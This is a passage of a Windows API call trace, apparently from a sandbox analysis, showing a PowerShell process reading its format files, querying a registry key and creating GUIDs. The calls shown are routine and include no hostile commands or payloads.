	[0225.187] ReadFile (in: hFile=0x358, lpBuffer=0x2d6f748, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xae9b4, lpOverlapped=0x0 | out: lpBuffer=0x2d6f748*, lpNumberOfBytesRead=0xae9b4*=0x1000, lpOverlapped=0x0) returned 1
	[0225.187] GetLastError () returned 0x0
	[0225.187] ReadFile (in: hFile=0x358, lpBuffer=0x2d6f748, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xae9b4, lpOverlapped=0x0 | out: lpBuffer=0x2d6f748*, lpNumberOfBytesRead=0xae9b4*=0x1000, lpOverlapped=0x0) returned 1
	[0225.187] GetLastError () returned 0x0
	[0225.187] ReadFile (in: hFile=0x358, lpBuffer=0x2d6f748, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xae9b4, lpOverlapped=0x0 | out: lpBuffer=0x2d6f748*, lpNumberOfBytesRead=0xae9b4*=0x1000, lpOverlapped=0x0) returned 1
	[0225.187] GetLastError () returned 0x0
	[0225.187] ReadFile (in: hFile=0x358, lpBuffer=0x2d6f748, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xae9b4, lpOverlapped=0x0 | out: lpBuffer=0x2d6f748*, lpNumberOfBytesRead=0xae9b4*=0x1000, lpOverlapped=0x0) returned 1
	[0225.187] GetLastError () returned 0x0
	[0225.187] ReadFile (in: hFile=0x358, lpBuffer=0x2d6f748, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xae9b4, lpOverlapped=0x0 | out: lpBuffer=0x2d6f748*, lpNumberOfBytesRead=0xae9b4*=0x1000, lpOverlapped=0x0) returned 1
	[0225.187] GetLastError () returned 0x0
	[0225.187] ReadFile (in: hFile=0x358, lpBuffer=0x2d6f748, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xae9b4, lpOverlapped=0x0 | out: lpBuffer=0x2d6f748*, lpNumberOfBytesRead=0xae9b4*=0x119, lpOverlapped=0x0) returned 1
	[0225.188] GetLastError () returned 0x0
	[0225.188] ReadFile (in: hFile=0x358, lpBuffer=0x2d6f748, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xae9b4, lpOverlapped=0x0 | out: lpBuffer=0x2d6f748*, lpNumberOfBytesRead=0xae9b4*=0x0, lpOverlapped=0x0) returned 1
	[0225.188] GetLastError () returned 0x0
	[0225.188] CloseHandle (hObject=0x358) returned 1
	[0225.188] GetLastError () returned 0x0
	[0225.188] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", nBufferLength=0x105, lpBuffer=0xae514, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", lpFilePart=0x0) returned 0x43
	[0225.188] GetLastError () returned 0x0
	[0225.188] SetErrorMode (uMode=0x1) returned 0x1
	[0225.188] GetFileAttributesExW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0\\filesystem.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x2d90744 | out: lpFileInformation=0x2d90744*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5a0c3fbd, ftCreationTime.dwHighDateTime=0x1ca03f9, ftLastAccessTime.dwLowDateTime=0x5a0c3fbd, ftLastAccessTime.dwHighDateTime=0x1ca03f9, ftLastWriteTime.dwLowDateTime=0xd2eaa6bc, ftLastWriteTime.dwHighDateTime=0x1c9ea11, nFileSizeHigh=0x0, nFileSizeLow=0x6119)) returned 1
	[0225.188] GetLastError () returned 0x0
	[0225.188] SetErrorMode (uMode=0x1) returned 0x1
	[0225.188] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", nBufferLength=0x105, lpBuffer=0xae4e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", lpFilePart=0x0) returned 0x43
	[0225.188] GetLastError () returned 0x0
	[0225.188] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0xae938 | out: phkResult=0xae938*=0x358) returned 0x0
	[0225.189] RegQueryValueExW (in: hKey=0x358, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0xae980, lpData=0x0, lpcbData=0xae97c*=0x0 | out: lpType=0xae980*=0x1, lpData=0x0, lpcbData=0xae97c*=0x56) returned 0x0
	[0225.189] RegQueryValueExW (in: hKey=0x358, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0xae980, lpData=0x3582a0, lpcbData=0xae97c*=0x56 | out: lpType=0xae980*=0x1, lpData="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0", lpcbData=0xae97c*=0x56) returned 0x0
	[0225.189] RegCloseKey (hKey=0x358) returned 0x0
	[0225.189] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", nBufferLength=0x105, lpBuffer=0xae4e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", lpFilePart=0x0) returned 0x43
	[0225.189] GetLastError () returned 0x0
	[0225.189] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", nBufferLength=0x105, lpBuffer=0xae474, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", lpFilePart=0x0) returned 0x43
	[0225.189] GetLastError () returned 0x0
	[0225.189] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xae1e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0225.189] GetLastError () returned 0x0
	[0225.189] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xae190, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0225.190] GetLastError () returned 0x0
	[0225.190] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xae190, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0225.190] GetLastError () returned 0x0
	[0225.190] VirtualQuery (in: lpAddress=0xad690, lpBuffer=0xae690, dwLength=0x1c | out: lpBuffer=0xae690*(BaseAddress=0xad000, AllocationBase=0x70000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0225.191] CoCreateGuid (in: pguid=0xae9a8 | out: pguid=0xae9a8*(Data1=0x2fce332e, Data2=0xd815, Data3=0x4bd8, Data4=([0]=0x9d, [1]=0xc8, [2]=0xb2, [3]=0x97, [4]=0x92, [5]=0xaf, [6]=0x90, [7]=0x55))) returned 0x0
	[0225.191] VirtualQuery (in: lpAddress=0xad6e0, lpBuffer=0xae6e0, dwLength=0x1c | out: lpBuffer=0xae6e0*(BaseAddress=0xad000, AllocationBase=0x70000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0225.191] CoCreateGuid (in: pguid=0xae9a8 | out: pguid=0xae9a8*(Data1=0xf40881bf, Data2=0x919a, Data3=0x4e1c, Data4=([0]=0x8b, [1]=0xb4, [2]=0x89, [3]=0x1, [4]=0x1e, [5]=0x6, [6]=0xa6, [7]=0x3c))) returned 0x0
	[0225.191] CoCreateGuid (in: pguid=0xae9a8 | out: pguid=0xae9a8*(Data1=0xc4fd53ef, Data2=0x3da5, Data3=0x463c, Data4=([0]=0xa0, [1]=0x1d, [2]=0xc, [3]=0x3f, [4]=0x1b, [5]=0x40, [6]=0x3a, [7]=0x14))) returned 0x0
	[0225.191] CoCreateGuid (in: pguid=0xae9a8 | out: pguid=0xae9a8*(Data1=0xd81835ce, Data2=0x86a, Data3=0x4463, Data4=([0]=0xae, [1]=0xa4, [2]=0x20, [3]=0xfc, [4]=0x5c, [5]=0x55, [6]=0x63, [7]=0xd))) returned 0x0
	[0225.191] VirtualQuery (in: lpAddress=0xad6e0, lpBuffer=0xae6e0, dwLength=0x1c | out: lpBuffer=0xae6e0*(BaseAddress=0xad000, AllocationBase=0x70000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0225.191] VirtualQuery (in: lpAddress=0xad6e0, lpBuffer=0xae6e0, dwLength=0x1c | out: lpBuffer=0xae6e0*(BaseAddress=0xad000, AllocationBase=0x70000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0225.191] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", nBufferLength=0x105, lpBuffer=0xae44c, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", lpFilePart=0x0) returned 0x3d
	[0225.191] GetLastError () returned 0x0
	[0225.191] SetErrorMode (uMode=0x1) returned 0x1
	[0225.192] CreateFileW (lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\Help.format.ps1xml" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0\\help.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x358
	[0225.192] GetLastError () returned 0x0
	[0225.192] GetFileType (hFile=0x358) returned 0x1
	[0225.192] SetErrorMode (uMode=0x1) returned 0x1
	[0225.192] GetFileType (hFile=0x358) returned 0x1
	[0225.192] ReadFile (in: hFile=0x358, lpBuffer=0x2db976c, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xae9b4, lpOverlapped=0x0 | out: lpBuffer=0x2db976c*, lpNumberOfBytesRead=0xae9b4*=0x1000, lpOverlapped=0x0) returned 1
	[0225.192] GetLastError () returned 0x0
	[0225.192] ReadFile (in: hFile=0x358, lpBuffer=0x2db976c, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xae9b4, lpOverlapped=0x0 | out: lpBuffer=0x2db976c*, lpNumberOfBytesRead=0xae9b4*=0x1000, lpOverlapped=0x0) returned 1
	[0225.192] GetLastError () returned 0x0
	[0225.192] ReadFile (in: hFile=0x358, lpBuffer=0x2db976c, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xae9b4, lpOverlapped=0x0 | out: lpBuffer=0x2db976c*, lpNumberOfBytesRead=0xae9b4*=0x1000, lpOverlapped=0x0) returned 1
	[0225.192] GetLastError () returned 0x0
	[0225.192] ReadFile (in: hFile=0x358, lpBuffer=0x2db976c, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xae9b4, lpOverlapped=0x0 | out: lpBuffer=0x2db976c*, lpNumberOfBytesRead=0xae9b4*=0x1000, lpOverlapped=0x0) returned 1
	[0225.192] GetLastError () returned 0x0
	[0225.193] ReadFile (in: hFile=0x358, lpBuffer=0x2db976c, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xae9b4, lpOverlapped=0x0 | out: lpBuffer=0x2db976c*, lpNumberOfBytesRead=0xae9b4*=0x1000, lpOverlapped=0x0) returned 1
	[0225.193] GetLastError () returned 0x0
	[0225.193] ReadFile (in: hFile=0x358, lpBuffer=0x2db976c, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xae9b4, lpOverlapped=0x0 | out: lpBuffer=0x2db976c*, lpNumberOfBytesRead=0xae9b4*=0x1000, lpOverlapped=0x0) returned 1
	[0225.193] GetLastError () returned 0x0
	[0225.193] ReadFile (in: hFile=0x358, lpBuffer=0x2db976c, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xae9b4, lpOverlapped=0x0 | out: lpBuffer=0x2db976c*, lpNumberOfBytesRead=0xae9b4*=0x1000, lpOverlapped=0x0) returned 1
	[0225.193] GetLastError () returned 0x0
	[0225.193] ReadFile (in: hFile=0x358, lpBuffer=0x2db976c, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xae9b4, lpOverlapped=0x0 | out: lpBuffer=0x2db976c*, lpNumberOfBytesRead=0xae9b4*=0x1000, lpOverlapped=0x0) returned 1
	[0225.193] GetLastError () returned 0x0
	[0225.194] ReadFile (in: hFile=0x358, lpBuffer=0x2db976c, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xae9b4, lpOverlapped=0x0 | out: lpBuffer=0x2db976c*, lpNumberOfBytesRead=0xae9b4*=0x1000, lpOverlapped=0x0) returned 1
	[0225.194] GetLastError () returned 0x0
	[0225.194] ReadFile (in: hFile=0x358, lpBuffer=0x2db976c, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xae9b4, lpOverlapped=0x0 | out: lpBuffer=0x2db976c*, lpNumberOfBytesRead=0xae9b4*=0x1000, lpOverlapped=0x0) returned 1
	[0225.195] GetLastError () returned 0x0
	[0225.195] ReadFile (in: hFile=0x358, lpBuffer=0x2db976c, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xae9b4, lpOverlapped=0x0 | out: lpBuffer=0x2db976c*, lpNumberOfBytesRead=0xae9b4*=0x1000, lpOverlapped=0x0) returned 1
	[0225.195] GetLastError () returned 0x0
	[0225.195] ReadFile (in: hFile=0x358, lpBuffer=0x2db976c, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xae9b4, lpOverlapped=0x0 | out: lpBuffer=0x2db976c*, lpNumberOfBytesRead=0xae9b4*=0x1000, lpOverlapped=0x0) returned 1
	[0225.195] GetLastError () returned 0x0
	[0225.195] ReadFile (in: hFile=0x358, lpBuffer=0x2db976c, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xae9b4, lpOverlapped=0x0 | out: lpBuffer=0x2db976c*, lpNumberOfBytesRead=0xae9b4*=0x1000, lpOverlapped=0x0) returned 1
	[0225.195] GetLastError () returned 0x0
	[0225.195] ReadFile (in: hFile=0x358, lpBuffer=0x2db976c, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xae9b4, lpOverlapped=0x0 | out: lpBuffer=0x2db976c*, lpNumberOfBytesRead=0xae9b4*=0x1000, lpOverlapped=0x0) returned 1
	[0225.195] GetLastError () returned 0x0
	[0225.196] ReadFile (in: hFile=0x358, lpBuffer=0x2db976c, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xae9b4, lpOverlapped=0x0 | out: lpBuffer=0x2db976c*, lpNumberOfBytesRead=0xae9b4*=0x1000, lpOverlapped=0x0) returned 1
	[0225.196] GetLastError () returned 0x0
	[0225.196] ReadFile (in: hFile=0x358, lpBuffer=0x2db976c, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xae9b4, lpOverlapped=0x0 | out: lpBuffer=0x2db976c*, lpNumberOfBytesRead=0xae9b4*=0x1000, lpOverlapped=0x0) returned 1
	[0225.196] GetLastError () returned 0x0
	[0225.198] ReadFile (in: hFile=0x358, lpBuffer=0x2db976c, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xae9b4, lpOverlapped=0x0 | out: lpBuffer=0x2db976c*, lpNumberOfBytesRead=0xae9b4*=0x1000, lpOverlapped=0x0) returned 1
	[0225.198] GetLastError () returned 0x0
	[0225.198] ReadFile (in: hFile=0x358, lpBuffer=0x2db976c, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xae9b4, lpOverlapped=0x0 | out: lpBuffer=0x2db976c*, lpNumberOfBytesRead=0xae9b4*=0x1000, lpOverlapped=0x0) returned 1
	[0225.199] GetLastError () returned 0x0
	[0225.199] ReadFile (in: hFile=0x358, lpBuffer=0x2db976c, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xae9b4, lpOverlapped=0x0 | out: lpBuffer=0x2db976c*, lpNumberOfBytesRead=0xae9b4*=0x1000, lpOverlapped=0x0) returned 1
	[0225.199] GetLastError () returned 0x0
	[0225.199] ReadFile (in: hFile=0x358, lpBuffer=0x2db976c, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xae9b4, lpOverlapped=0x0 | out: lpBuffer=0x2db976c*, lpNumberOfBytesRead=0xae9b4*=0x1000, lpOverlapped=0x0) returned 1
	[0225.199] GetLastError () returned 0x0
	[0225.199] ReadFile (in: hFile=0x358, lpBuffer=0x2db976c, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xae9b4, lpOverlapped=0x0 | out: lpBuffer=0x2db976c*, lpNumberOfBytesRead=0xae9b4*=0x1000, lpOverlapped=0x0) returned 1
	[0225.199] GetLastError () returned 0x0
	[0225.199] ReadFile (in: hFile=0x358, lpBuffer=0x2db976c, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xae9b4, lpOverlapped=0x0 | out: lpBuffer=0x2db976c*, lpNumberOfBytesRead=0xae9b4*=0x1000, lpOverlapped=0x0) returned 1
	[0225.199] GetLastError () returned 0x0
	[0225.200] ReadFile (in: hFile=0x358, lpBuffer=0x2db976c, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xae9b4, lpOverlapped=0x0 | out: lpBuffer=0x2db976c*, lpNumberOfBytesRead=0xae9b4*=0x1000, lpOverlapped=0x0) returned 1
	[0225.200] GetLastError () returned 0x0
	[0225.200] ReadFile (in: hFile=0x358, lpBuffer=0x2db976c, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xae9b4, lpOverlapped=0x0 | out: lpBuffer=0x2db976c*, lpNumberOfBytesRead=0xae9b4*=0x1000, lpOverlapped=0x0) returned 1
	[0225.200] GetLastError () returned 0x0
	[0225.200] ReadFile (in: hFile=0x358, lpBuffer=0x2db976c, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xae9b4, lpOverlapped=0x0 | out: lpBuffer=0x2db976c*, lpNumberOfBytesRead=0xae9b4*=0x1000, lpOverlapped=0x0) returned 1
	[0225.200] GetLastError () returned 0x0
	[0225.200] ReadFile (in: hFile=0x358, lpBuffer=0x2db976c, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xae9b4, lpOverlapped=0x0 | out: lpBuffer=0x2db976c*, lpNumberOfBytesRead=0xae9b4*=0x1000, lpOverlapped=0x0) returned 1
	[0225.200] GetLastError () returned 0x0
	[0225.200] ReadFile (in: hFile=0x358, lpBuffer=0x2db976c, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xae9b4, lpOverlapped=0x0 | out: lpBuffer=0x2db976c*, lpNumberOfBytesRead=0xae9b4*=0x1000, lpOverlapped=0x0) returned 1
	[0225.200] GetLastError () returned 0x0
	[0225.201] ReadFile (in: hFile=0x358, lpBuffer=0x2db976c, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xae9b4, lpOverlapped=0x0 | out: lpBuffer=0x2db976c*, lpNumberOfBytesRead=0xae9b4*=0x1000, lpOverlapped=0x0) returned 1
	[0225.201] GetLastError () returned 0x0
	[0225.201] ReadFile (in: hFile=0x358, lpBuffer=0x2db976c, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xae9b4, lpOverlapped=0x0 | out: lpBuffer=0x2db976c*, lpNumberOfBytesRead=0xae9b4*=0x1000, lpOverlapped=0x0) returned 1
	[0225.201] GetLastError () returned 0x0
	[0225.201] ReadFile (in: hFile=0x358, lpBuffer=0x2db976c, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xae9b4, lpOverlapped=0x0 | out: lpBuffer=0x2db976c*, lpNumberOfBytesRead=0xae9b4*=0x1000, lpOverlapped=0x0) returned 1
	[0225.201] GetLastError () returned 0x0
	[0225.201] ReadFile (in: hFile=0x358, lpBuffer=0x2db976c, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xae9b4, lpOverlapped=0x0 | out: lpBuffer=0x2db976c*, lpNumberOfBytesRead=0xae9b4*=0x1000, lpOverlapped=0x0) returned 1
	[0225.201] GetLastError () returned 0x0
	[0225.201] ReadFile (in: hFile=0x358, lpBuffer=0x2db976c, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xae9b4, lpOverlapped=0x0 | out: lpBuffer=0x2db976c*, lpNumberOfBytesRead=0xae9b4*=0x1000, lpOverlapped=0x0) returned 1
	[0225.202] GetLastError () returned 0x0
	[0225.206] ReadFile (in: hFile=0x358, lpBuffer=0x2db976c, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xae9b4, lpOverlapped=0x0 | out: lpBuffer=0x2db976c*, lpNumberOfBytesRead=0xae9b4*=0x1000, lpOverlapped=0x0) returned 1
	[0225.206] GetLastError () returned 0x0
	[0225.206] ReadFile (in: hFile=0x358, lpBuffer=0x2db976c, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xae9b4, lpOverlapped=0x0 | out: lpBuffer=0x2db976c*, lpNumberOfBytesRead=0xae9b4*=0x1000, lpOverlapped=0x0) returned 1
	[0225.206] GetLastError () returned 0x0
	[0225.207] ReadFile (in: hFile=0x358, lpBuffer=0x2db976c, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xae9b4, lpOverlapped=0x0 | out: lpBuffer=0x2db976c*, lpNumberOfBytesRead=0xae9b4*=0x1000, lpOverlapped=0x0) returned 1
	[0225.207] GetLastError () returned 0x0
	[0225.207] ReadFile (in: hFile=0x358, lpBuffer=0x2db976c, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xae9b4, lpOverlapped=0x0 | out: lpBuffer=0x2db976c*, lpNumberOfBytesRead=0xae9b4*=0x1000, lpOverlapped=0x0) returned 1
	[0225.207] GetLastError () returned 0x0
	[0225.207] ReadFile (in: hFile=0x358, lpBuffer=0x2db976c, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xae9b4, lpOverlapped=0x0 | out: lpBuffer=0x2db976c*, lpNumberOfBytesRead=0xae9b4*=0x1000, lpOverlapped=0x0) returned 1
	[0225.207] GetLastError () returned 0x0
	[0225.207] ReadFile (in: hFile=0x358, lpBuffer=0x2db976c, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xae9b4, lpOverlapped=0x0 | out: lpBuffer=0x2db976c*, lpNumberOfBytesRead=0xae9b4*=0x1000, lpOverlapped=0x0) returned 1
	[0225.207] GetLastError () returned 0x0
	[0225.207] ReadFile (in: hFile=0x358, lpBuffer=0x2db976c, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xae9b4, lpOverlapped=0x0 | out: lpBuffer=0x2db976c*, lpNumberOfBytesRead=0xae9b4*=0x1000, lpOverlapped=0x0) returned 1
	[0225.207] GetLastError () returned 0x0
	[0225.208] ReadFile (in: hFile=0x358, lpBuffer=0x2db976c, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xae9b4, lpOverlapped=0x0 | out: lpBuffer=0x2db976c*, lpNumberOfBytesRead=0xae9b4*=0x1000, lpOverlapped=0x0) returned 1
	[0225.208] GetLastError () returned 0x0
	[0225.208] ReadFile (in: hFile=0x358, lpBuffer=0x2db976c, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xae9b4, lpOverlapped=0x0 | out: lpBuffer=0x2db976c*, lpNumberOfBytesRead=0xae9b4*=0x1000, lpOverlapped=0x0) returned 1
	[0225.208] GetLastError () returned 0x0
	[0225.208] ReadFile (in: hFile=0x358, lpBuffer=0x2db976c, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xae9b4, lpOverlapped=0x0 | out: lpBuffer=0x2db976c*, lpNumberOfBytesRead=0xae9b4*=0x1000, lpOverlapped=0x0) returned 1
	[0225.208] GetLastError () returned 0x0
	[0225.208] ReadFile (in: hFile=0x358, lpBuffer=0x2db976c, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xae9b4, lpOverlapped=0x0 | out: lpBuffer=0x2db976c*, lpNumberOfBytesRead=0xae9b4*=0x1000, lpOverlapped=0x0) returned 1
	[0225.208] GetLastError () returned 0x0
	[0225.208] ReadFile (in: hFile=0x358, lpBuffer=0x2db976c, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xae9b4, lpOverlapped=0x0 | out: lpBuffer=0x2db976c*, lpNumberOfBytesRead=0xae9b4*=0x1000, lpOverlapped=0x0) returned 1
	[0225.208] GetLastError () returned 0x0
	[0225.209] ReadFile (in: hFile=0x358, lpBuffer=0x2db976c, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xae9b4, lpOverlapped=0x0 | out: lpBuffer=0x2db976c*, lpNumberOfBytesRead=0xae9b4*=0x1000, lpOverlapped=0x0) returned 1
	[0225.209] GetLastError () returned 0x0
	[0225.209] ReadFile (in: hFile=0x358, lpBuffer=0x2db976c, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xae9b4, lpOverlapped=0x0 | out: lpBuffer=0x2db976c*, lpNumberOfBytesRead=0xae9b4*=0x1000, lpOverlapped=0x0) returned 1
	[0225.209] GetLastError () returned 0x0
	[0225.209] ReadFile (in: hFile=0x358, lpBuffer=0x2db976c, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xae9b4, lpOverlapped=0x0 | out: lpBuffer=0x2db976c*, lpNumberOfBytesRead=0xae9b4*=0x1000, lpOverlapped=0x0) returned 1
	[0225.209] GetLastError () returned 0x0
	[0225.209] ReadFile (in: hFile=0x358, lpBuffer=0x2db976c, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xae9b4, lpOverlapped=0x0 | out: lpBuffer=0x2db976c*, lpNumberOfBytesRead=0xae9b4*=0x1000, lpOverlapped=0x0) returned 1
	[0225.209] GetLastError () returned 0x0
	[0225.210] ReadFile (in: hFile=0x358, lpBuffer=0x2db976c, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xae9b4, lpOverlapped=0x0 | out: lpBuffer=0x2db976c*, lpNumberOfBytesRead=0xae9b4*=0x1000, lpOverlapped=0x0) returned 1
	[0225.210] GetLastError () returned 0x0
	[0225.210] ReadFile (in: hFile=0x358, lpBuffer=0x2db976c, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xae9b4, lpOverlapped=0x0 | out: lpBuffer=0x2db976c*, lpNumberOfBytesRead=0xae9b4*=0x1000, lpOverlapped=0x0) returned 1
	[0225.210] GetLastError () returned 0x0
	[0225.210] ReadFile (in: hFile=0x358, lpBuffer=0x2db976c, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xae9b4, lpOverlapped=0x0 | out: lpBuffer=0x2db976c*, lpNumberOfBytesRead=0xae9b4*=0x1000, lpOverlapped=0x0) returned 1
	[0225.210] GetLastError () returned 0x0
	[0225.210] ReadFile (in: hFile=0x358, lpBuffer=0x2db976c, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xae9b4, lpOverlapped=0x0 | out: lpBuffer=0x2db976c*, lpNumberOfBytesRead=0xae9b4*=0x1000, lpOverlapped=0x0) returned 1
	[0225.210] GetLastError () returned 0x0
	[0225.210] ReadFile (in: hFile=0x358, lpBuffer=0x2db976c, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xae9b4, lpOverlapped=0x0 | out: lpBuffer=0x2db976c*, lpNumberOfBytesRead=0xae9b4*=0x1000, lpOverlapped=0x0) returned 1
	[0225.210] GetLastError () returned 0x0
	[0225.211] ReadFile (in: hFile=0x358, lpBuffer=0x2db976c, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xae9b4, lpOverlapped=0x0 | out: lpBuffer=0x2db976c*, lpNumberOfBytesRead=0xae9b4*=0x1000, lpOverlapped=0x0) returned 1
	[0225.211] GetLastError () returned 0x0
	[0225.211] ReadFile (in: hFile=0x358, lpBuffer=0x2db976c, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xae9b4, lpOverlapped=0x0 | out: lpBuffer=0x2db976c*, lpNumberOfBytesRead=0xae9b4*=0x1000, lpOverlapped=0x0) returned 1
	[0225.211] GetLastError () returned 0x0
	[0225.211] ReadFile (in: hFile=0x358, lpBuffer=0x2db976c, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xae9b4, lpOverlapped=0x0 | out: lpBuffer=0x2db976c*, lpNumberOfBytesRead=0xae9b4*=0x1000, lpOverlapped=0x0) returned 1
	[0225.211] GetLastError () returned 0x0
